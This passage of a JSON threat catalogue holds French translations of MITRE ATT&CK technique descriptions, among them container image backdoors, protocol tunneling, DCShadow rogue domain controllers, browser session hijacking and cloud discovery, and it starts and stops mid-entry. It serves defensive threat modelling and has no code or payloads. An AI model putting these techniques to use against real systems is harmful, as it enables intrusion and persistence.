transf\u00e9rer l\u2019information hors du r\u00e9seau, comme [Exfiltration sur canal C2](https://attack.mitre.org/techniques/T1041) ou [Exfiltration sur protocole alternatif](https://attack.mitre.org/techniques/T1048).\nhttps://attack.mitre.org/techniques/T1029\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1525 - Image interne de l\u2019implant", - "description": "Les adversaires peuvent implanter des images cloud ou conteneur avec du code malveillant pour \u00e9tablir la persistance apr\u00e8s avoir acc\u00e9d\u00e9 \u00e0 un environnement. Amazon Web Services (AWS), Amazon Machine Images (AMI), Google Cloud Platform (GCP) Images et Azure Images, ainsi que des environnements d\u2019ex\u00e9cution de conteneurs populaires tels que Docker, peuvent \u00eatre implant\u00e9s ou d\u00e9rob\u00e9s. Contrairement \u00e0 [Upload Malware](https://attack.mitre.org/techniques/T1608/001), cette technique se concentre sur les adversaires implantant une image dans un registre dans l\u2019environnement d\u2019une victime. Selon la fa\u00e7on dont l\u2019infrastructure est provisionn\u00e9e, cela peut fournir un acc\u00e8s permanent si l\u2019outil de provisionnement d\u2019infrastructure est invit\u00e9 \u00e0 toujours utiliser l\u2019image la plus r\u00e9cente. (Citation: Rhino Labs Cloud Image Backdoor Technique septembre 2019) Un outil a \u00e9t\u00e9 d\u00e9velopp\u00e9 pour faciliter la plantation de portes d\u00e9rob\u00e9es dans les images de conteneurs cloud. (Citation : Rhino Labs Cloud Backdoor septembre 2019) Si un adversaire a acc\u00e8s \u00e0 une instance AWS compromise et a l\u2019autorisation de r\u00e9pertorier les images de conteneur disponibles, il peut implanter une porte d\u00e9rob\u00e9e telle qu\u2019un [Web Shell](https://attack.mitre.org/techniques/T1505/003). (Citation: Rhino Labs Cloud Image Backdoor Technique septembre 2019)\nhttps://attack.mitre.org/techniques/T1525\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1572 - Tunneling de protocole", - "description": "Les adversaires peuvent tunneliser les communications r\u00e9seau vers et depuis un syst\u00e8me victime dans le cadre d\u2019un protocole distinct pour \u00e9viter la d\u00e9tection/filtrage r\u00e9seau et/ou permettre l\u2019acc\u00e8s \u00e0 des syst\u00e8mes autrement inaccessibles. Le tunneling implique l\u2019encapsulation explicite d\u2019un protocole dans un autre. Ce comportement peut dissimuler le trafic malveillant en se fondant dans le trafic existant et/ou fournir une couche externe de chiffrement (similaire \u00e0 un VPN). Le tunneling peut \u00e9galement permettre le routage de paquets r\u00e9seau qui, autrement, n\u2019atteindraient pas leur destination pr\u00e9vue, tels que SMB, RDP ou tout autre trafic qui serait filtr\u00e9 par les appliances r\u00e9seau ou non achemin\u00e9 sur Internet. Il existe diff\u00e9rents moyens d\u2019encapsuler un protocole dans un autre protocole. Par exemple, les adversaires peuvent effectuer un tunneling SSH (\u00e9galement connu sous le nom de redirection de port SSH), qui implique le transfert de donn\u00e9es arbitraires sur un tunnel SSH chiffr\u00e9. (Citation : Tunneling SSH) [Tunneling de protocole] (https://attack.mitre.org/techniques/T1572) peuvent \u00e9galement \u00eatre abus\u00e9s par des adversaires pendant [R\u00e9solution dynamique](https://attack.mitre.org/techniques/T1568). Connues sous le nom de DNS over HTTPS (DoH), les requ\u00eates pour r\u00e9soudre l\u2019infrastructure C2 peuvent \u00eatre encapsul\u00e9es dans des paquets HTTPS chiffr\u00e9s. (Citation: BleepingComp Godlua JUL19) Les adversaires peuvent \u00e9galement tirer parti du [tunneling de protocole](https://attack.mitre.org/techniques/T1572) en conjonction avec [Proxy](https://attack.mitre.org/techniques/T1090) et/ou [Emprunt d\u2019identit\u00e9 de protocole](https://attack.mitre.org/techniques/T1001/003) pour dissimuler davantage les communications et l\u2019infrastructure C2.\nhttps://attack.mitre.org/techniques/T1572\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1550 - Utiliser un autre mat\u00e9riel d\u2019authentification", - "description": "Les adversaires peuvent utiliser d\u2019autres \u00e9l\u00e9ments d\u2019authentification, tels que des hachages de mot de passe, des tickets Kerberos et des jetons d\u2019acc\u00e8s aux applications, afin de se d\u00e9placer lat\u00e9ralement dans un environnement et de contourner les contr\u00f4les d\u2019acc\u00e8s syst\u00e8me normaux. Les processus d\u2019authentification n\u00e9cessitent g\u00e9n\u00e9ralement une identit\u00e9 valide (par exemple, un nom d\u2019utilisateur) ainsi qu\u2019un ou plusieurs facteurs d\u2019authentification (par exemple, mot de passe, code PIN, carte \u00e0 puce physique, g\u00e9n\u00e9rateur de jetons, etc.). Le mat\u00e9riel d\u2019authentification alternatif est l\u00e9gitimement g\u00e9n\u00e9r\u00e9 par les syst\u00e8mes apr\u00e8s qu\u2019un utilisateur ou une application s\u2019est authentifi\u00e9 avec succ\u00e8s en fournissant une identit\u00e9 valide et le ou les facteurs d\u2019authentification requis. D\u2019autres documents d\u2019authentification peuvent \u00e9galement \u00eatre g\u00e9n\u00e9r\u00e9s au cours du processus de cr\u00e9ation d\u2019identit\u00e9. (Citation : Authentification NIST) (R\u00e9f\u00e9rence : NIST MFA) La mise en cache d\u2019un autre mat\u00e9riel d\u2019authentification permet au syst\u00e8me de v\u00e9rifier qu\u2019une identit\u00e9 s\u2019est authentifi\u00e9e avec succ\u00e8s sans demander \u00e0 l\u2019utilisateur de saisir \u00e0 nouveau le ou les facteurs d\u2019authentification. \u00c9tant donn\u00e9 que l\u2019authentification alternative doit \u00eatre maintenue par le syst\u00e8me, soit en m\u00e9moire, soit sur disque, il peut \u00eatre \u00e0 risque d\u2019\u00eatre vol\u00e9 par les techniques [d\u2019acc\u00e8s aux informations d\u2019identification](https://attack.mitre.org/tactics/TA0006). En volant du mat\u00e9riel d\u2019authentification alternatif, les adversaires sont en mesure de contourner les contr\u00f4les d\u2019acc\u00e8s au syst\u00e8me et de s\u2019authentifier aupr\u00e8s des syst\u00e8mes sans conna\u00eetre le mot de passe en texte brut ou tout facteur d\u2019authentification suppl\u00e9mentaire.\nhttps://attack.mitre.org/techniques/T1550\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1011 - Exfiltration sur un autre support de r\u00e9seau", - "description": "Les adversaires peuvent tenter d\u2019exfiltrer des donn\u00e9es sur un support r\u00e9seau diff\u00e9rent du canal de commande et de contr\u00f4le. Si le r\u00e9seau de commande et de contr\u00f4le est une connexion Internet c\u00e2bl\u00e9e, l\u2019exfiltration peut se produire, par exemple, via une connexion WiFi, un modem, une connexion de donn\u00e9es cellulaires, Bluetooth ou un autre canal de radiofr\u00e9quence (RF). Les adversaires peuvent choisir de le faire s\u2019ils ont un acc\u00e8s ou une proximit\u00e9 suffisants, et la connexion peut ne pas \u00eatre s\u00e9curis\u00e9e ou d\u00e9fendue aussi bien que le canal principal connect\u00e9 \u00e0 Internet car elle n\u2019est pas achemin\u00e9e via le m\u00eame r\u00e9seau d\u2019entreprise.\nhttps://attack.mitre.org/techniques/T1011\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1589 - Recueillir des renseignements sur l\u2019identit\u00e9 des victimes", - "description": "Les adversaires peuvent recueillir des informations sur l\u2019identit\u00e9 de la victime qui peuvent \u00eatre utilis\u00e9es lors du ciblage. Les informations sur les identit\u00e9s peuvent inclure une vari\u00e9t\u00e9 de d\u00e9tails, y compris des donn\u00e9es personnelles (par exemple, les noms des employ\u00e9s, les adresses e-mail, etc.) ainsi que des d\u00e9tails sensibles tels que les informations d\u2019identification. Les adversaires peuvent recueillir ces informations de diverses mani\u00e8res, par exemple en d\u00e9clenchant directement l\u2019obtention de [Hame\u00e7onnage \u00e0 l\u2019information](https://attack.mitre.org/techniques/T1598). Les informations sur les utilisateurs peuvent \u00e9galement \u00eatre \u00e9num\u00e9r\u00e9es par d\u2019autres moyens actifs (c.-\u00e0-d. [Analyse active](https://attack.mitre.org/techniques/T1595)) tels que l\u2019exploration et l\u2019analyse des r\u00e9ponses des services d\u2019authentification susceptibles de r\u00e9v\u00e9ler des noms d\u2019utilisateur valides dans un syst\u00e8me. (Citation: Nom d\u2019utilisateur GrimBlogEnum) Les renseignements sur les victimes peuvent \u00e9galement \u00eatre expos\u00e9s \u00e0 des adversaires par l\u2019entremise d\u2019ensembles de donn\u00e9es en ligne ou d\u2019autres ensembles de donn\u00e9es accessibles (p. ex. [M\u00e9dias sociaux](https://attack.mitre.org/techniques/T1593/001) ou [Recherche sur les sites Web appartenant aux victimes](https://attack.mitre.org/techniques/T1594)). (Citation : Fuite OPM) (R\u00e9f\u00e9rence : Register Deloitte) (Citation: Register Uber) (Citation: Detectify Slack Tokens) (Citation: Forbes GitHub Creds) (Citation: GitHub truffleHog) (Citation: GitHub Gitrob) (Citation : CNET Leaks) La collecte de ces informations peut r\u00e9v\u00e9ler des possibilit\u00e9s d\u2019autres formes de reconnaissance (p. ex., [Recherche de sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593) ou [Hame\u00e7onnage \u00e0 des fins d\u2019information](https://attack.mitre.org/techniques/T1598)), d\u2019\u00e9tablissement de ressources op\u00e9rationnelles (p. ex. [Comptes compromis](https://attack.mitre.org/techniques/T1586)) et/ou d\u2019acc\u00e8s initial (p. ex. [Hame\u00e7onnage](https://attack.mitre.org/techniques/T1566) ou [Comptes valides]( https://attack.mitre.org/techniques/T1078)).\nhttps://attack.mitre.org/techniques/T1589\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1560 - Archiver les donn\u00e9es collect\u00e9es", - "description": "Un adversaire peut compresser et/ou chiffrer les donn\u00e9es collect\u00e9es avant l\u2019exfiltration. La compression des donn\u00e9es peut aider \u00e0 obscurcir les donn\u00e9es collect\u00e9es et \u00e0 minimiser la quantit\u00e9 de donn\u00e9es envoy\u00e9es sur le r\u00e9seau. Le chiffrement peut \u00eatre utilis\u00e9 pour cacher les informations qui sont exfiltr\u00e9es de la d\u00e9tection ou rendre l\u2019exfiltration moins visible lors de l\u2019inspection par un d\u00e9fenseur. La compression et le chiffrement sont effectu\u00e9s avant l\u2019exfiltration et peuvent \u00eatre effectu\u00e9s \u00e0 l\u2019aide d\u2019un utilitaire, d\u2019une biblioth\u00e8que tierce ou d\u2019une m\u00e9thode personnalis\u00e9e.\nhttps://attack.mitre.org/techniques/T1560\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1185 - D\u00e9tournement de session de navigateur", - "description": "Les adversaires peuvent tirer parti des failles de s\u00e9curit\u00e9 et des fonctionnalit\u00e9s inh\u00e9rentes aux logiciels de navigation pour modifier le contenu, modifier les comportements des utilisateurs et intercepter des informations dans le cadre de diverses techniques de d\u00e9tournement de session de navigateur. (Citation: Wikipedia Man in the Browser) Un exemple sp\u00e9cifique est lorsqu\u2019un adversaire injecte un logiciel dans un navigateur qui lui permet d\u2019h\u00e9riter des cookies, des sessions HTTP et des certificats clients SSL d\u2019un utilisateur, puis utilise le navigateur comme moyen de pivoter vers un intranet authentifi\u00e9. (Citation : Cobalt Strike Browser Pivot) (Citation: ICEBRG Chrome Extensions) L\u2019ex\u00e9cution de comportements bas\u00e9s sur un navigateur, tels que le pivotement, peut n\u00e9cessiter des autorisations de processus sp\u00e9cifiques, telles que SeDebugPrivilege et/ou des droits d\u2019administrateur \u00e0 haute int\u00e9grit\u00e9. Un autre exemple consiste \u00e0 faire pivoter le trafic du navigateur de l\u2019adversaire via le navigateur de l\u2019utilisateur en configurant un proxy qui redirigera le trafic Web. Cela ne modifie en rien le trafic de l\u2019utilisateur et la connexion proxy peut \u00eatre interrompue d\u00e8s que le navigateur est ferm\u00e9. L\u2019adversaire assume le contexte de s\u00e9curit\u00e9 du processus de navigateur dans lequel le proxy est inject\u00e9. Les navigateurs cr\u00e9ent g\u00e9n\u00e9ralement un nouveau processus pour chaque onglet ouvert et les autorisations et les certificats sont s\u00e9par\u00e9s en cons\u00e9quence. Avec ces autorisations, un adversaire pourrait potentiellement acc\u00e9der \u00e0 n\u2019importe quelle ressource sur un intranet, telle que [Sharepoint](https://attack.mitre.org/techniques/T1213/002) ou webmail, accessible via le navigateur et dont le navigateur dispose d\u2019autorisations suffisantes. Le pivotement du navigateur peut \u00e9galement contourner la s\u00e9curit\u00e9 fournie par l\u2019authentification \u00e0 2 facteurs. (R\u00e9f\u00e9rence : manuel cobaltstrike)\nhttps://attack.mitre.org/techniques/T1185\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1021 - Services \u00e0 distance", - "description": "Les adversaires peuvent utiliser [Comptes valides](https://attack.mitre.org/techniques/T1078) pour se connecter \u00e0 un service qui accepte les connexions distantes, tel que telnet, SSH et VNC. L\u2019adversaire peut alors effectuer des actions en tant qu\u2019utilisateur connect\u00e9. Dans un environnement d\u2019entreprise, les serveurs et les postes de travail peuvent \u00eatre organis\u00e9s en domaines. Les domaines fournissent une gestion centralis\u00e9e des identit\u00e9s, permettant aux utilisateurs de se connecter \u00e0 l\u2019aide d\u2019un ensemble d\u2019informations d\u2019identification sur l\u2019ensemble du r\u00e9seau. Si un adversaire est en mesure d\u2019obtenir un ensemble d\u2019informations d\u2019identification de domaine valides, il peut se connecter \u00e0 de nombreuses machines diff\u00e9rentes \u00e0 l\u2019aide de protocoles d\u2019acc\u00e8s \u00e0 distance tels que Secure Shell (SSH) ou RDP (Remote Desktop Protocol). (R\u00e9f\u00e9rence : SSH Secure Shell) (R\u00e9f\u00e9rence : Services Bureau \u00e0 distance TechNet) Ils peuvent \u00e9galement se connecter \u00e0 des services SaaS ou IaaS accessibles, tels que ceux qui f\u00e9d\u00e8rent leurs identit\u00e9s au domaine. Les applications l\u00e9gitimes (telles que [Outils de d\u00e9ploiement de logiciels](https://attack.mitre.org/techniques/T1072) et autres programmes d\u2019administration) peuvent utiliser [Services distants](https://attack.mitre.org/techniques/T1021) pour acc\u00e9der \u00e0 des h\u00f4tes distants. Par exemple, Apple Remote Desktop (ARD) sur macOS est un logiciel natif utilis\u00e9 pour la gestion \u00e0 distance. ARD exploite une combinaison de protocoles, y compris [VNC](https://attack.mitre.org/techniques/T1021/005) pour envoyer l\u2019\u00e9cran et contr\u00f4ler les tampons et [SSH](https://attack.mitre.org/techniques/T1021/004) pour le transfert s\u00e9curis\u00e9 des fichiers. (Citation : Gestion \u00e0 distance MDM macOS) (Citation: Kickstart Apple Remote Desktop commandes) (Citation: Guide d\u2019administration Apple Remote Desktop 3.3) Les adversaires peuvent abuser d\u2019applications telles que ARD pour ex\u00e9cuter du code \u00e0 distance et effectuer des mouvements lat\u00e9raux. Dans les versions de macOS ant\u00e9rieures \u00e0 10.14, un adversaire peut faire remonter une session SSH vers une session ARD, ce qui permet \u00e0 un adversaire d\u2019accepter les invites TCC (Transparence, Consentement et Contr\u00f4le) sans intervention de l\u2019utilisateur et d\u2019acc\u00e9der aux donn\u00e9es. (Citation: FireEye 2019 Apple Remote Desktop) (Citation: Lockboxx ARD 2019) (Citation: Kickstart Apple Remote Desktop commandes)\nhttps://attack.mitre.org/techniques/T1021\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1596 - Recherche dans des bases de donn\u00e9es techniques ouvertes", - "description": "Les adversaires peuvent rechercher dans des bases de donn\u00e9es techniques librement accessibles des informations sur les victimes qui peuvent \u00eatre utilis\u00e9es lors du ciblage. Des informations sur les victimes peuvent \u00eatre disponibles dans des bases de donn\u00e9es et des d\u00e9p\u00f4ts en ligne, tels que les enregistrements de domaines/certificats ainsi que les collections publiques de donn\u00e9es/artefacts de r\u00e9seau recueillies \u00e0 partir du trafic et/ou des scans. (R\u00e9f\u00e9rence : WHOIS) (Citation: DNS Dumpster) (Citation : Circl Passive DNS) (Citation: Medium SSL Cert) (Citation : Recherche SSLShopper) (R\u00e9f\u00e9rence : DigitalShadows CDN) (R\u00e9f\u00e9rence : Shodan) Les adversaires peuvent effectuer des recherches dans diff\u00e9rentes bases de donn\u00e9es ouvertes en fonction des informations qu\u2019ils cherchent \u00e0 recueillir. L\u2019information provenant de ces sources peut r\u00e9v\u00e9ler des possibilit\u00e9s de reconnaissance (p. ex. : [Hame\u00e7onnage d\u2019informations](https://attack.mitre.org/techniques/T1598) ou [Recherche de sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), d\u2019\u00e9tablissement de ressources op\u00e9rationnelles (p. ex. : [Acqu\u00e9rir l\u2019infrastructure](https://attack.mitre.org/techniques/T1583) ou [Compromettre l\u2019infrastructure](https://attack.mitre.org/techniques/T1584)), et/ou d\u2019acc\u00e8s initial (p. ex. : [T\u00e9l\u00e9commande externe Services](https://attack.mitre.org/techniques/T1133) ou [Relation de confiance](https://attack.mitre.org/techniques/T1199)).\nhttps://attack.mitre.org/techniques/T1596\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1207 - Contr\u00f4leur de domaine non autoris\u00e9", - "description": "Les adversaires peuvent enregistrer un contr\u00f4leur de domaine non autoris\u00e9 pour permettre la manipulation des donn\u00e9es Active Directory. DCShadow peut \u00eatre utilis\u00e9 pour cr\u00e9er un contr\u00f4leur de domaine (DC) non autoris\u00e9. DCShadow est une m\u00e9thode de manipulation des donn\u00e9es Active Directory (AD), y compris les objets et les sch\u00e9mas, en enregistrant (ou en r\u00e9utilisant un enregistrement inactif) et en simulant le comportement d\u2019un contr\u00f4leur de domaine. (Citation : DCShadow Blog) Une fois inscrit, un contr\u00f4leur de domaine non autoris\u00e9 peut injecter et r\u00e9pliquer des modifications dans l\u2019infrastructure AD pour n\u2019importe quel objet de domaine, y compris les informations d\u2019identification et les cl\u00e9s. L\u2019enregistrement d\u2019un contr\u00f4leur de domaine non fiable implique la cr\u00e9ation d\u2019un serveur et d\u2019objets nTDSDSA dans la partition Configuration du sch\u00e9ma AD, ce qui n\u00e9cessite des privil\u00e8ges d\u2019administrateur (domaine ou local du contr\u00f4leur de domaine) ou le hachage KRBTGT. (R\u00e9f\u00e9rence : Guide Adsecurity Mimikatz) Cette technique peut contourner la journalisation du syst\u00e8me et les moniteurs de s\u00e9curit\u00e9 tels que les produits de gestion des informations et des \u00e9v\u00e9nements de s\u00e9curit\u00e9 (SIEM) (car les actions effectu\u00e9es sur un contr\u00f4leur de domaine non autoris\u00e9 peuvent ne pas \u00eatre signal\u00e9es \u00e0 ces capteurs). (Citation : DCShadow Blog) La technique peut \u00e9galement \u00eatre utilis\u00e9e pour modifier et supprimer la r\u00e9plication et d\u2019autres m\u00e9tadonn\u00e9es associ\u00e9es afin d\u2019entraver l\u2019analyse m\u00e9dico-l\u00e9gale. Les adversaires peuvent \u00e9galement utiliser cette technique pour effectuer [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) et/ou manipuler des objets AD (tels que des comptes, des listes de contr\u00f4le d\u2019acc\u00e8s, des sch\u00e9mas) afin d\u2019\u00e9tablir des portes d\u00e9rob\u00e9es pour la persistance. (Citation : DCShadow Blog)\nhttps://attack.mitre.org/techniques/T1207\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1610 - D\u00e9ployer le conteneur", - "description": "Les adversaires peuvent d\u00e9ployer un conteneur dans un environnement pour faciliter l\u2019ex\u00e9cution ou \u00e9chapper aux d\u00e9fenses. Dans certains cas, les adversaires peuvent d\u00e9ployer un nouveau conteneur pour ex\u00e9cuter des processus associ\u00e9s \u00e0 une image ou \u00e0 un d\u00e9ploiement particulier, tels que des processus qui ex\u00e9cutent ou t\u00e9l\u00e9chargent des logiciels malveillants. Dans d\u2019autres, un adversaire peut d\u00e9ployer un nouveau conteneur configur\u00e9 sans r\u00e8gles de r\u00e9seau, limitations d\u2019utilisateurs, etc. pour contourner les d\u00e9fenses existantes dans l\u2019environnement. Les conteneurs peuvent \u00eatre d\u00e9ploy\u00e9s par diff\u00e9rents moyens, par exemple via les API create et start de Docker ou via une application Web telle que le tableau de bord Kubernetes ou Kubeflow. (Citation : API Docker Containers) (Citation : Tableau de bord Kubernetes) (R\u00e9f\u00e9rence : Kubeflow Pipelines) Les adversaires peuvent d\u00e9ployer des conteneurs bas\u00e9s sur des images malveillantes r\u00e9cup\u00e9r\u00e9es ou construites ou \u00e0 partir d\u2019images b\u00e9nignes qui t\u00e9l\u00e9chargent et ex\u00e9cutent des charges utiles malveillantes au moment de l\u2019ex\u00e9cution. (Citation: Aqua Build Images sur les h\u00f4tes)\nhttps://attack.mitre.org/techniques/T1610\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1112 - Modifier le Registre", - "description": "Les adversaires peuvent interagir avec le Registre Windows pour masquer les informations de configuration dans les cl\u00e9s de Registre, supprimer des informations dans le cadre du nettoyage ou dans le cadre d\u2019autres techniques pour faciliter la persistance et l\u2019ex\u00e9cution. L\u2019acc\u00e8s \u00e0 des zones sp\u00e9cifiques du Registre d\u00e9pend des autorisations de compte, certaines n\u00e9cessitant un acc\u00e8s de niveau administrateur. L\u2019utilitaire de ligne de commande Windows int\u00e9gr\u00e9 [Reg](https://attack.mitre.org/software/S0075) peut \u00eatre utilis\u00e9 pour la modification du Registre local ou distant. (R\u00e9f\u00e9rence : Microsoft Reg) D\u2019autres outils peuvent \u00e9galement \u00eatre utilis\u00e9s, tels qu\u2019un outil d\u2019acc\u00e8s \u00e0 distance, qui peut contenir une fonctionnalit\u00e9 permettant d\u2019interagir avec le Registre via l\u2019API Windows. Les modifications du Registre peuvent \u00e9galement inclure des actions pour masquer les cl\u00e9s, telles que les noms de cl\u00e9s en attente avec un caract\u00e8re nul, qui provoqueront une erreur et/ou seront ignor\u00e9s lors de la lecture via [Reg](https://attack.mitre.org/software/S0075) ou d\u2019autres utilitaires utilisant l\u2019API Win32. (Citation: Microsoft Reghide NOV 2006) Les adversaires peuvent abuser de ces cl\u00e9s pseudo-cach\u00e9es pour dissimuler les charges utiles / commandes utilis\u00e9es pour maintenir la persistance. (Citation: TrendMicro POWELIKS AO\u00dbT 2014) (Citation: SpectorOps Hiding Reg Jul 2017) Le registre d\u2019un syst\u00e8me distant peut \u00eatre modifi\u00e9 pour faciliter l\u2019ex\u00e9cution des fichiers dans le cadre d\u2019un mouvement lat\u00e9ral. Il n\u00e9cessite que le service Registre distant soit ex\u00e9cut\u00e9 sur le syst\u00e8me cible. (R\u00e9f\u00e9rence : Microsoft Remote) Souvent, [Comptes valides](https://attack.mitre.org/techniques/T1078) sont requis, ainsi que l\u2019acc\u00e8s aux [Partages d\u2019administration SMB/Windows](https://attack.mitre.org/techniques/T1021/002) du syst\u00e8me distant pour la communication RPC.\nhttps://attack.mitre.org/techniques/T1112\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1580 - D\u00e9couverte de l\u2019infrastructure cloud", - "description": "Un adversaire peut tenter de d\u00e9couvrir l\u2019infrastructure et les ressources disponibles dans un environnement IaaS (Infrastructure as-a-Service). Cela inclut les ressources de service de calcul telles que les instances, les machines virtuelles et les snapshots, ainsi que les ressources d\u2019autres services, y compris les services de stockage et de base de donn\u00e9es. Les fournisseurs de cloud proposent des m\u00e9thodes telles que des API et des commandes \u00e9mises via des CLI pour fournir des informations sur l\u2019infrastructure. Par exemple, AWS fournit une API DescribeInstances dans l\u2019API Amazon EC2 qui peut renvoyer des informations sur une ou plusieurs instances d\u2019un compte, l\u2019API ListBuckets qui renvoie une liste de tous les compartiments appartenant \u00e0 l\u2019exp\u00e9diteur authentifi\u00e9 de la demande, l\u2019API HeadBucket pour d\u00e9terminer l\u2019existence d\u2019un compartiment ainsi que les autorisations d\u2019acc\u00e8s du request sender ou l\u2019API GetPublicAccessBlock pour r\u00e9cup\u00e9rer la configuration du bloc d\u2019acc\u00e8s pour un compartiment. (Citation : Amazon Describe Instance) (Citation : Amazon Describe Instances API) (Citation : AWS Get Public Access Block) (R\u00e9f\u00e9rence : AWS Head Bucket) De m\u00eame, l\u2019interface de ligne de commande du Kit de d\u00e9veloppement logiciel (SDK) Cloud SDK de GCP fournit la commande gcloud compute instances list pour r\u00e9pertorier toutes les instances Google Compute Engine d\u2019un projet (Citation : Google Compute Instances), et la commande CLI d\u2019Azure az vm list r\u00e9pertorie les d\u00e9tails des machines virtuelles. (R\u00e9f\u00e9rence : Microsoft AZ CLI) En plus des commandes API, les adversaires peuvent utiliser des outils open source pour d\u00e9couvrir l\u2019infrastructure de stockage cloud via [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003). (Citation: Malwarebytes OSINT Leaky Buckets - Hioureas) Un adversaire peut \u00e9num\u00e9rer des ressources \u00e0 l\u2019aide des cl\u00e9s d\u2019acc\u00e8s d\u2019un utilisateur compromis pour d\u00e9terminer celles qui sont disponibles pour cet utilisateur. (Citation : Expulser IO Evil dans AWS) La d\u00e9couverte de ces ressources disponibles peut aider les adversaires \u00e0 d\u00e9terminer leurs prochaines \u00e9tapes dans l\u2019environnement Cloud, telles que l\u2019\u00e9tablissement de la persistance. (Citation: Mandiant M-Trends 2020) Un adversaire peut \u00e9galement utiliser ces informations pour modifier la configuration afin de rendre le compartiment accessible au public, ce qui permet d\u2019acc\u00e9der aux donn\u00e9es sans authentification. Les adversaires peuvent \u00e9galement utiliser des API de d\u00e9couverte d\u2019infrastructure telles que DescribeDBInstances pour d\u00e9terminer la taille, le propri\u00e9taire, les autorisations et les listes de contr\u00f4le d\u2019acc\u00e8s r\u00e9seau des ressources de base de donn\u00e9es. (R\u00e9f\u00e9rence : AWS Describe DB Instances) Les adversaires peuvent utiliser ces informations pour d\u00e9terminer la valeur potentielle des bases de donn\u00e9es et d\u00e9couvrir les conditions requises pour y acc\u00e9der. Contrairement \u00e0 [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), cette technique se concentre sur la d\u00e9couverte des composants des services fournis plut\u00f4t que sur les services eux-m\u00eames.\nhttps://attack.mitre.org/techniques/T1580\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1491 - D\u00e9gradation", - "description": "Les adversaires peuvent modifier le contenu visuel disponible en interne ou en externe \u00e0 un r\u00e9seau d\u2019entreprise, affectant ainsi l\u2019int\u00e9grit\u00e9 du contenu original. Les raisons de [D\u00e9figuration](https://attack.mitre.org/techniques/T1491) comprennent la diffusion de messages, l\u2019intimidation ou la revendication (peut-\u00eatre fausse) d\u2019une intrusion. Les images d\u00e9rangeantes ou offensantes peuvent \u00eatre utilis\u00e9es dans le cadre de [D\u00e9gradation](https://attack.mitre.org/techniques/T1491) afin de causer de l\u2019inconfort \u00e0 l\u2019utilisateur ou de faire pression sur le respect des messages d\u2019accompagnement.\nhttps://attack.mitre.org/techniques/T1491\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1535 - R\u00e9gions cloud inutilis\u00e9es/non prises en charge", - "description": "Les adversaires peuvent cr\u00e9er des instances cloud dans des r\u00e9gions de service g\u00e9ographiques inutilis\u00e9es afin d\u2019\u00e9chapper \u00e0 la d\u00e9tection. L\u2019acc\u00e8s est g\u00e9n\u00e9ralement obtenu par le biais de comptes compromettants utilis\u00e9s pour g\u00e9rer l\u2019infrastructure cloud. Les fournisseurs de services cloud fournissent souvent une infrastructure dans le monde entier afin d\u2019am\u00e9liorer les performances, de fournir une redondance et de permettre aux clients de r\u00e9pondre aux exigences de conformit\u00e9. Souvent, un client n\u2019utilisera qu\u2019un sous-ensemble des r\u00e9gions disponibles et ne surveillera pas activement les autres r\u00e9gions. Si un adversaire cr\u00e9e des ressources dans une r\u00e9gion inutilis\u00e9e, il peut \u00eatre en mesure d\u2019op\u00e9rer sans \u00eatre d\u00e9tect\u00e9. Une variante de ce comportement tire parti des diff\u00e9rences de fonctionnalit\u00e9s entre les r\u00e9gions cloud. Un adversaire pourrait utiliser des r\u00e9gions qui ne prennent pas en charge les services de d\u00e9tection avanc\u00e9s afin d\u2019\u00e9viter la d\u00e9tection de son activit\u00e9. Un exemple d\u2019utilisation contradictoire de r\u00e9gions AWS inutilis\u00e9es consiste \u00e0 exploiter la crypto-monnaie via [Resource Hijacking](https://attack.mitre.org/techniques/T1496), ce qui peut co\u00fbter aux organisations des sommes d\u2019argent substantielles au fil du temps en fonction de la puissance de traitement utilis\u00e9e. (Citation : CloudSploit - R\u00e9gions AWS inutilis\u00e9es)\nhttps://attack.mitre.org/techniques/T1535\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1563 - D\u00e9tournement de session de service \u00e0 distance", - "description": "Les adversaires peuvent prendre le contr\u00f4le de sessions pr\u00e9existantes avec des services distants pour se d\u00e9placer lat\u00e9ralement dans un environnement. Les utilisateurs peuvent utiliser des informations d\u2019identification valides pour se connecter \u00e0 un service sp\u00e9cialement con\u00e7u pour accepter les connexions distantes, tel que telnet, SSH et RDP. Lorsqu\u2019un utilisateur se connecte \u00e0 un service, une session est \u00e9tablie qui lui permettra de maintenir une interaction continue avec ce service. Les adversaires peuvent r\u00e9quisitionner ces sessions pour effectuer des actions sur des syst\u00e8mes distants. [D\u00e9tournement de session de service \u00e0 distance] (https://attack.mitre.org/techniques/T1563) diff\u00e8re de l\u2019utilisation de [Remote Services](https://attack.mitre.org/techniques/T1021) car il d\u00e9tourne une session existante plut\u00f4t que de cr\u00e9er une nouvelle session \u00e0 l\u2019aide de [Comptes valides](https://attack.mitre.org/techniques/T1078). (Citation : RDP Hijacking Medium) (Citation : Violation Post-mortem SSH Hijack)\nhttps://attack.mitre.org/techniques/T1563\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1217 - D\u00e9couverte des informations du navigateur", - "description": "Les adversaires peuvent \u00e9num\u00e9rer des informations sur les navigateurs 